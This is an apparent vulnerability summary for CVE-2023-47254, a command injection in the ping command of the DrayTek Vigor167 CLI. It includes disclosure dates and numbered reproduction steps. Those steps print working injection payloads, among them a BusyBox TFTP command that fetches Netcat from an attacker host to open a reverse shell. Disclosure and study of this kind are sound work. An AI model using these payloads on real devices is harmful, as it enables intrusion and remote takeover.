CVE-2023-47254

An attacker first logs into the CLI (Telnet or SSH) using any account created in the web interface, including accounts whose group settings deny all access [ref_id=1]. Once authenticated, the attacker issues the `ping` command with injected OS commands using backticks (``) or `$()` syntax. For example, `exec ping \`pwd\`` causes the device to execute `pwd` and treat the output as a hostname [ref_id=1]. The attacker can chain BusyBox commands (using `${IFS}` to bypass space-character evaluation errors) to download a reverse-shell payload via TFTP and achieve full remote code execution [ref_id=1].

The command-line interface (CLI) accessible via Telnet and SSH on the DrayTek Vigor167 (version 5.2.2) is vulnerable. The `ping` command does not sanitize user input, allowing injection of arbitrary OS commands through backticks or `$()` syntax [ref_id=1].

The advisory states the solution status was "Open" at the time of disclosure, with a solution date of 2023-11-16 [ref_id=1]. No patch diff is provided in the bundle. The manufacturer was notified on 2023-09-22 and a solution was reportedly made available on 2023-11-16, but the advisory does not describe the remediation content [ref_id=1].

1. Log into the Vigor167 CLI via Telnet or SSH using any web-interface account. 2. Execute `exec ping \`pwd\`` to confirm command injection (the output shows `ping: /tmp: Unknown host`). 3. To achieve a reverse shell, set up a TFTP server on an attacker machine (e.g., 192.168.100.5) hosting a statically compiled Netcat binary. 4. On the device, run: `exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\`` to download the payload. 5. Execute the downloaded Netcat binary to establish a reverse shell back to the attacker [ref_id=1].